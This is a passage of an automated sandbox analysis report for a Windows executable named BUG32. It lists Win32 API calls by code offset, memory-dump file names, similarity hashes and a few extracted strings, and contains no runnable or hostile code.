                            • GetDC.USER32(?), ref: 00407EF2
                            • SendMessageA.USER32(?,00000031,00000000,00000000), ref: 00407F03
                            • SelectObject.GDI32(?,00000000), ref: 00407F13
                            • GetTextExtentPoint32A.GDI32(?,0040E37C,00000002,?), ref: 00407F26
                            • GetSystemMetrics.USER32(0000002D), ref: 00407F34
                            • GetSystemMetrics.USER32(0000002E), ref: 00407F3D
                            • SelectObject.GDI32(?,?), ref: 00407F58
                            • ReleaseDC.USER32(?,?), ref: 00407F5F
                            Memory Dump Source
                            • Source File: 00000000.00000002.2052013413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.2051977337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052051403.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052089640.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052709995.000000000070F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052740544.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_BUG32.jbxd
                            Similarity
                            • API ID: MetricsObjectSelectSystem$ExtentMessagePoint32ReleaseSendText
                            • String ID:
                            • API String ID: 3163728332-0
                            • Opcode ID: 0f85b4e4a9fc8b79d69eeafc8d0715c0d9c044a8da73acc8e4df1bf12666f1d4
                            • Instruction ID: 8283d6b8dd1d926a849a740107421f7df2a32296598c76c534472c33a359a7ad
                            • Opcode Fuzzy Hash: 0f85b4e4a9fc8b79d69eeafc8d0715c0d9c044a8da73acc8e4df1bf12666f1d4
                            • Instruction Fuzzy Hash: B7110775900208FFDB119F94EC85E9DBFB5FB48740F10807AFA04AB2A0D7719A55DB94
                            APIs
                            • IsWindowEnabled.USER32(00000133), ref: 00407DE4
                            • SetTextColor.GDI32(?,?), ref: 00407E04
                            • GetSysColor.USER32(0000000F), ref: 00407E1C
                            • SetBkColor.GDI32(?,00000000), ref: 00407E24
                            • GetSysColor.USER32(00000005), ref: 00407E2C
                            • SetBkColor.GDI32(?,00000000), ref: 00407E34
                            • GetSysColorBrush.USER32(00000005), ref: 00407E38
                            • SetBkColor.GDI32(?,?), ref: 00407E4A
                            Memory Dump Source
                            • Source File: 00000000.00000002.2052013413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.2051977337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052051403.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052089640.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052709995.000000000070F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052740544.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_BUG32.jbxd
                            Similarity
                            • API ID: Color$BrushEnabledTextWindow
                            • String ID:
                            • API String ID: 3110319690-0
                            • Opcode ID: 15dd324e6d87555f60676a39c55d1979f8783d0520253fd8cc4a9ecb2a02918c
                            • Instruction ID: ea6497d59861f2c7d1418620421d280c7cf0ea6ce7282b7dae3f5aca9775fd38
                            • Opcode Fuzzy Hash: 15dd324e6d87555f60676a39c55d1979f8783d0520253fd8cc4a9ecb2a02918c
                            • Instruction Fuzzy Hash: 02118231505304AFD2309B28DC48A67B3ACEB84721F00067BF665A26E1C774BC49CAA7
                            APIs
                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 00407185
                            • GetCurrentThreadId.KERNEL32 ref: 00407193
                            • IsWindowVisible.USER32(?), ref: 0040719A
                              • Part of subcall function 0040CA50: HeapAlloc.KERNEL32(00000008,00000000,0040C342,-00000010,00C41948,00000000,0040A8B5,00C41950,00000000,?,?,?,00000000,00401967,00000001,004102FC), ref: 0040CA5C
                            • GetCurrentThreadId.KERNEL32 ref: 004071B7
                            • GetWindowLongA.USER32(?,000000EC), ref: 004071C4
                            • GetForegroundWindow.USER32 ref: 004071D2
                            • IsWindowEnabled.USER32(?), ref: 004071DD
                            • EnableWindow.USER32(?,00000000), ref: 004071EE
                            Memory Dump Source
                            • Source File: 00000000.00000002.2052013413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.2051977337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052051403.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052089640.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052709995.000000000070F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052740544.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_BUG32.jbxd
                            Similarity
                            • API ID: Window$Thread$Current$AllocEnableEnabledForegroundHeapLongProcessVisible
                            • String ID:
                            • API String ID: 3383493704-0
                            • Opcode ID: fbabd1d99a3cebefa898a7c70f8374f49a2f0e5e4d815a4ee12fcde7f7c63d93
                            • Instruction ID: e712b6c10cf8435dcd8dbc61f472ba8282815d2ec391fb75644f0810dafbc121
                            • Opcode Fuzzy Hash: fbabd1d99a3cebefa898a7c70f8374f49a2f0e5e4d815a4ee12fcde7f7c63d93
                            • Instruction Fuzzy Hash: FF01F1325082019BD330AB34AC88B2BB6E8AF51754F00883EF495F26E0CB789845862A
                            APIs
                            • EnterCriticalSection.KERNEL32(004105D8,00000000,PostEventClass,00000028,004105D0,0040B1F5,?,00000028,PostEventClass,00000000,?,0040B0F2,004105D0,PostEventClass,00000000), ref: 0040C868
                            • LeaveCriticalSection.KERNEL32(004105D8,?,0040B0F2,004105D0,PostEventClass,00000000,?,?,0040ACA0,00000008,00000007,00000000,004105D0,00000400,00000028,0040ABCA), ref: 0040C8BA
                              • Part of subcall function 0040C851: HeapFree.KERNEL32(00000000,?,?,0040B0F2,004105D0,PostEventClass,00000000,?,?,0040ACA0,00000008,00000007,00000000,004105D0,00000400,00000028), ref: 0040C8B3
                            • DeleteCriticalSection.KERNEL32(00000048,00000028,PostEventClass,00000028,004105D0,0040B1F5,?,00000028,PostEventClass,00000000,?,0040B0F2,004105D0,PostEventClass,00000000), ref: 0040C8D2
                            • HeapFree.KERNEL32(00000000,00000028,00000028,PostEventClass,00000028,004105D0,0040B1F5,?,00000028,PostEventClass,00000000,?,0040B0F2,004105D0,PostEventClass,00000000), ref: 0040C8E0
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2052013413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.2051977337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052051403.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052089640.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052709995.000000000070F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052740544.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_BUG32.jbxd
                            Similarity
                            • API ID: CriticalSection$FreeHeap$DeleteEnterLeave
                            • String ID: PostEventClass
                            • API String ID: 3171405041-11513545
                            • Opcode ID: 5954c4eceda85e88469c1c2f6cf38fe0847fe6303139b5a925bced0c09385034
                            • Instruction ID: 72a934d78e803511e8e7c269155e80643799fe271d94b93cb5fae491333d41c5
                            • Opcode Fuzzy Hash: 5954c4eceda85e88469c1c2f6cf38fe0847fe6303139b5a925bced0c09385034
                            • Instruction Fuzzy Hash: 3A11F872501611EFC720AF55E9C8866BBA9FB48302304893FF656A3661C775AC45CFAC
                            APIs
                            • LoadLibraryA.KERNEL32(Kernel32.dll,004105D0,00000000,0040ABC6,?,?,0040C4D4,004105F0,0040C482,76EC5E70,00000000,004105D0,?,?,0040B181,0040ABC2), ref: 0040C93C
                            • GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 0040C951
                            • FreeLibrary.KERNEL32(00000000,?,?,0040C4D4,004105F0,0040C482,76EC5E70,00000000,004105D0,?,?,0040B181,0040ABC2,00000010,00010000,00000004), ref: 0040C96C
                            • Sleep.KERNEL32(00000000,00000028,0040ABCA,0040ABE7), ref: 0040C98E
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2052013413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.2051977337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052051403.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052089640.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052709995.000000000070F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052740544.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_BUG32.jbxd
                            Similarity
                            • API ID: Library$AddressFreeLoadProcSleep
                            • String ID: InitOnceExecuteOnce$Kernel32.dll
                            • API String ID: 938261879-1339284965
                            • Opcode ID: 5fadeecbc21f03116c336525defd7b75cad57ad249eab7cbd3324a522738bc83
                            • Instruction ID: a6303c425d322f281212e57d386ba0a40f23723656bf740f249d5257f9293268
                            • Opcode Fuzzy Hash: 5fadeecbc21f03116c336525defd7b75cad57ad249eab7cbd3324a522738bc83
                            • Instruction Fuzzy Hash: AA01F7B2200305FBD7312F669CCAE6F3A28DB91B65B20023AF405B11C0EA7D9906856E
                            APIs
                            • CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,?,00C41950,?), ref: 0040A761
                            • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000,00C41950,?), ref: 0040A79F
                            • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000080,00000000,00C41950,?), ref: 0040A7E0
                            • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000005,00000000,00000000), ref: 0040A7FC
                            • HeapAlloc.KERNEL32(00C40000,00000000,00001000,?,?,?,00C41950,?), ref: 0040A84C
                            • SetFilePointer.KERNEL32(?,00000000,00000000,?,?,?,?,00C41950,?), ref: 0040A87F
                            Memory Dump Source
                            • Source File: 00000000.00000002.2052013413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.2051977337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052051403.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052089640.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052709995.000000000070F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052740544.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_BUG32.jbxd
                            Similarity
                            • API ID: File$Create$AllocHeapPointer
                            • String ID:
                            • API String ID: 4207849991-0
                            • Opcode ID: 55bb105aab58c5533d285934d5d97931dc9e42b8ed90866618726e7d3f69534d
                            • Instruction ID: 0b578d09a6197491f24cce3a30260f9e2d27dba2188bdcacc6643d1ae54f6165
                            • Opcode Fuzzy Hash: 55bb105aab58c5533d285934d5d97931dc9e42b8ed90866618726e7d3f69534d
                            • Instruction Fuzzy Hash: 1E410872604300ABD3309B289C44F67B7A4ABC4764F14C63AFA90B72D0C778EC56876E
                            APIs
                            • GetWindowRect.USER32(00000003,?), ref: 0040940C
                            • GetSystemMetrics.USER32(00000000), ref: 00409428
                            • GetSystemMetrics.USER32(00000001), ref: 0040943B
                            • GetActiveWindow.USER32 ref: 00409459
                            • GetWindowRect.USER32(00408AB4,00408AB4), ref: 00409468
                            • SetWindowPos.USER32(00000003,00000000,00000002,00000002,00000000,00000000,00000015,?,?,?,?,00408AB4), ref: 004094AA
                            Memory Dump Source
                            • Source File: 00000000.00000002.2052013413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.2051977337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052051403.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052089640.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052709995.000000000070F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052740544.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_BUG32.jbxd
                            Similarity
                            • API ID: Window$MetricsRectSystem$Active
                            • String ID:
                            • API String ID: 1462147845-0
                            • Opcode ID: b037a3b19bd6273d545c2e88e5aafa3b36018cfb6d44615966a718f2bc265447
                            • Instruction ID: 5ddc8509bd1e8ccae3572fcfd18c69961d4e3331f3c90b0ef937933808d8f80d
                            • Opcode Fuzzy Hash: b037a3b19bd6273d545c2e88e5aafa3b36018cfb6d44615966a718f2bc265447
                            • Instruction Fuzzy Hash: 4E21A332A0411AAFDB10CFBCCD89AAF7BA5AF44350F094639EC04F7281D634EC068754
                            APIs
                            • EnumWindows.USER32(0040717B,00000000), ref: 00407211
                            • GetCurrentThreadId.KERNEL32 ref: 00407223
                            • SetWindowPos.USER32(?,000000FE,00000000,00000000,00000000,00000000,00000003,?,?,00000000,00406FB8,00000001,?,00401325,00000010,OPS), ref: 0040723E
                            • GetCurrentThreadId.KERNEL32 ref: 0040725C
                            • EnableWindow.USER32(?,00000001), ref: 00407270
                            • SetWindowPos.USER32(?,000000FF,00000000,00000000,00000000,00000000,00000003,?,?,?,00000000,00406FB8,00000001,?,00401325,00000010), ref: 00407286
                            Memory Dump Source
                            • Source File: 00000000.00000002.2052013413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.2051977337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052051403.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052089640.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052709995.000000000070F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052740544.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_BUG32.jbxd
                            Similarity
                            • API ID: Window$CurrentThread$EnableEnumWindows
                            • String ID:
                            • API String ID: 2527101397-0
                            • Opcode ID: 2c24496c44e4451b28c6ed7acb32c39cc221206354a1d5e85daabe8294d67b3a
                            • Instruction ID: b1504476e7fd6488b059a71b3c12954f4c44a74890f91bb65e1701639e2767ca
                            • Opcode Fuzzy Hash: 2c24496c44e4451b28c6ed7acb32c39cc221206354a1d5e85daabe8294d67b3a
                            • Instruction Fuzzy Hash: DB11B472848345BFD7309F509C84D27B769EB40364B144ABEF1A1326E0D7763C858699
                            APIs
                              • Part of subcall function 00408E65: GetPropA.USER32(?,PB_WindowID), ref: 00408E90
                              • Part of subcall function 00408E65: GetParent.USER32(?), ref: 00408E9F
                            • GetPropA.USER32(?,PB_MDI_Gadget), ref: 00409388
                            • DefFrameProcA.USER32(?,00000000,?,?,?), ref: 004093C9
                            • SetLastError.KERNEL32(00000000), ref: 004093D3
                            • DefWindowProcA.USER32(?,?,?,?), ref: 004093E9
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2052013413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.2051977337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052051403.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052089640.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052709995.000000000070F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052740544.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_BUG32.jbxd
                            Similarity
                            • API ID: ProcProp$ErrorFrameLastParentWindow
                            • String ID: PB_MDI_Gadget
                            • API String ID: 2919463471-983833826
                            • Opcode ID: a1d0ae3a514413fa2ec42e083591c7a2a86cdce7ff5e90a5ca086b2150e91c3f
                            • Instruction ID: 9f3bca6a8bffebc59d24936684649ede2b42e523f815a99e69fd62e13eda02c3
                            • Opcode Fuzzy Hash: a1d0ae3a514413fa2ec42e083591c7a2a86cdce7ff5e90a5ca086b2150e91c3f
                            • Instruction Fuzzy Hash: 9E115E71604219ABDB249E05DC84EAB3A2CEB09751F040437FD15B22D1C7B89C619FAA
                            APIs
                            • SetWindowLongA.USER32(00000000,000000FC,00408410), ref: 00408507
                            • SetWindowLongA.USER32(00000000,000000F4,000000FF), ref: 00408512
                            • SetPropA.USER32(00000000,PB_ID,000000FF), ref: 0040851D
                            • SendMessageA.USER32(00000000,00000030,?,00000001), ref: 0040852E
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2052013413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.2051977337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052051403.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052089640.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052709995.000000000070F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052740544.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_BUG32.jbxd
                            Similarity
                            • API ID: LongWindow$MessagePropSend
                            • String ID: PB_ID
                            • API String ID: 499798845-4173770792
                            • Opcode ID: 6d2973c3987fac87e4e856274ea84e4071f0bfbd2e7e30c96d25c938bac23d54
                            • Instruction ID: 91c73f382e79538686be5da03df50d7d6c11517fdf0a1697ce8d0597801b4e6b
                            • Opcode Fuzzy Hash: 6d2973c3987fac87e4e856274ea84e4071f0bfbd2e7e30c96d25c938bac23d54
                            • Instruction Fuzzy Hash: 15019E71100319BFCB209F55DD84E8ABFA8FB44760F20863AF864A72D0C775E950CB94
                            APIs
                            • strlen.MSVCRT ref: 0040CFF5
                            • HeapAlloc.KERNEL32(026C0000,00000000,-00000005), ref: 0040D017
                            • HeapReAlloc.KERNEL32(026C0000,00000000,?,-00000005), ref: 0040D03A
                            • HeapFree.KERNEL32(026C0000,00000000,Continue?,?,?,0040406F,?,Continue?,00401128,00000008,00000000,0040F200,00000007,00000004,00000015,00000000), ref: 0040D070
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2052013413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.2051977337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052051403.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052089640.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052709995.000000000070F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052740544.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_BUG32.jbxd
                            Similarity
                            • API ID: Heap$Alloc$Freestrlen
                            • String ID: Continue?
                            • API String ID: 1646265118-4041895036
                            • Opcode ID: f7f3492046667017dfc3778a7fa78b462f45ec13a740d70e1b4f618421e66950
                            • Instruction ID: 2fab9ee7579fa0d097bf04e6ad7c1a5c38ae7b827fe95a1678174b87d57f52f7
                            • Opcode Fuzzy Hash: f7f3492046667017dfc3778a7fa78b462f45ec13a740d70e1b4f618421e66950
                            • Instruction Fuzzy Hash: 4E21DBB4A00208EFDB00DFA4C894F5A77B5EB88354F10C169F9199B3A0D776AE46DB94
                            APIs
                              • Part of subcall function 0040B516: memset.MSVCRT ref: 0040B57E
                              • Part of subcall function 0040C851: EnterCriticalSection.KERNEL32(004105D8,00000000,PostEventClass,00000028,004105D0,0040B1F5,?,00000028,PostEventClass,00000000,?,0040B0F2,004105D0,PostEventClass,00000000), ref: 0040C868
                              • Part of subcall function 0040C851: HeapFree.KERNEL32(00000000,?,?,0040B0F2,004105D0,PostEventClass,00000000,?,?,0040ACA0,00000008,00000007,00000000,004105D0,00000400,00000028), ref: 0040C8B3
                              • Part of subcall function 0040C851: LeaveCriticalSection.KERNEL32(004105D8,?,0040B0F2,004105D0,PostEventClass,00000000,?,?,0040ACA0,00000008,00000007,00000000,004105D0,00000400,00000028,0040ABCA), ref: 0040C8BA
                            • HeapFree.KERNEL32(00000000,?,?,00000028,PostEventClass,00000000,?,0040B0F2,004105D0,PostEventClass,00000000,?,?,0040ACA0,00000008,00000007), ref: 0040B205
                            • HeapFree.KERNEL32(00000000,?,?,0040B0F2,004105D0,PostEventClass,00000000,?,?,0040ACA0,00000008,00000007,00000000,004105D0,00000400,00000028), ref: 0040B211
                            • HeapFree.KERNEL32(00000000,?,004105D0,?,0040B0F2,004105D0,PostEventClass,00000000,?,?,0040ACA0,00000008,00000007,00000000,004105D0,00000400), ref: 0040B225
                            • HeapFree.KERNEL32(00000000,00000028,?,0040B0F2,004105D0,PostEventClass,00000000,?,?,0040ACA0,00000008,00000007,00000000,004105D0,00000400,00000028), ref: 0040B23B
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2052013413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.2051977337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052051403.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052089640.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052709995.000000000070F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052740544.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_BUG32.jbxd
                            Similarity
                            • API ID: FreeHeap$CriticalSection$EnterLeavememset
                            • String ID: PostEventClass
                            • API String ID: 4254243056-11513545
                            • Opcode ID: b47460727091e2a4652ab0134d2ea27e2ab38e2dfc1445fa598b7385fb8900ce
                            • Instruction ID: f86fc144d11636d409a09ec552813e18b09b9ba8f02c782cac19633227270d00
                            • Opcode Fuzzy Hash: b47460727091e2a4652ab0134d2ea27e2ab38e2dfc1445fa598b7385fb8900ce
                            • Instruction Fuzzy Hash: DFF04F36100118BFC6217F56ED88C5BBBAEFF85354346447EF105A2A30C6B2BC919AA8
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.2052013413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.2051977337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052051403.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052089640.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052709995.000000000070F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052740544.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_BUG32.jbxd
                            Similarity
                            • API ID: Window$Focus$EnabledLongVisible
                            • String ID:
                            • API String ID: 1625685152-0
                            • Opcode ID: bca886ff3686d2122bd92e31de7aa837ac06d0e51ccb327088b287a8deaefd4d
                            • Instruction ID: 9ee11c7b9d8b1d9a9016031235141405fa14496948ec8204867d5691bea8fd39
                            • Opcode Fuzzy Hash: bca886ff3686d2122bd92e31de7aa837ac06d0e51ccb327088b287a8deaefd4d
                            • Instruction Fuzzy Hash: 4AF0C8322042016FD7224F769CC863BB2A8EFC5769710843EF041F21E1D778DC46D629
                            APIs
                            • SetTextColor.GDI32(?,?), ref: 00407C71
                            • GetSysColor.USER32(0000000F), ref: 00407C7F
